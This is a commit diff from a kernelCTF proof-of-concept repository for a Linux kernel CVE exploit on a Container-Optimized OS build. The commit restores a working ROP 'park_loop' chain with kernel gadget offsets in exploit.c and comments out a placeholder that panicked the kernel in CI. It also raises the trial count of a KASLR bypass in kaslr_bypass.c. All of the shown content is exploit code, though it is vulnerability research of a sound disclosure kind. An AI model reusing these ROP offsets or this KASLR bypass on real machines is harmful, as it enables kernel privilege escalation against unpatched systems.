fix: do not panic kernel as CI will not read dmesg.

Author: pjwhatforlunch

pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c

@@ -158,21 +158,21 @@ void init_libxdk(void) {
             {RopItemType::SYMBOL, 0x20f4b0},
         });
 
-        // st.AddRopAction("park_loop", {
-        //     {RopItemType::SYMBOL, 0x2a0d4c},
-        //     {RopItemType::SYMBOL, 0x649},
-        //     {RopItemType::CONSTANT_VALUE, 0x0},
-        //     {RopItemType::SYMBOL, 0x649},
-        // });
-
-        // Panic the kernel in CI to avoid timeout.
         st.AddRopAction("park_loop", {
-            {RopItemType::SYMBOL, 0xdeadbeefcafebabe},
-            {RopItemType::SYMBOL, 0xdeadbeefcafebabe},
-            {RopItemType::CONSTANT_VALUE, 0xdeadbeefcafebabe},
-            {RopItemType::SYMBOL, 0xdeadbeefcafebabe},
+            {RopItemType::SYMBOL, 0x2a0d4c},
+            {RopItemType::SYMBOL, 0x649},
+            {RopItemType::CONSTANT_VALUE, 0x0},
+            {RopItemType::SYMBOL, 0x649},
         });
 
+        // Panic the kernel in CI to avoid timeout.
+        // st.AddRopAction("park_loop", {
+        //     {RopItemType::SYMBOL, 0xdeadbeefcafebabe},
+        //     {RopItemType::SYMBOL, 0xdeadbeefcafebabe},
+        //     {RopItemType::CONSTANT_VALUE, 0xdeadbeefcafebabe},
+        //     {RopItemType::SYMBOL, 0xdeadbeefcafebabe},
+        // });
+
         st.AddRopAction("queue_work_cpu0_then_stop", {
             {RopItemType::SYMBOL, 0xafda91},
             {RopItemType::ARGUMENT, 0},

pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/kaslr_bypass.c

@@ -79,7 +79,7 @@ int bypass_(uint64_t base) {
         #define START (0xffffffff81000000ull)
         #define END   (0xffffffffc0000000ull)
         #define STEP   0x0000000000200000ull
-        #define NUM_TRIALS 7
+        #define NUM_TRIALS 13
         // largest contiguous mapped area at the beginning of _stext
         #define WINDOW_SIZE 12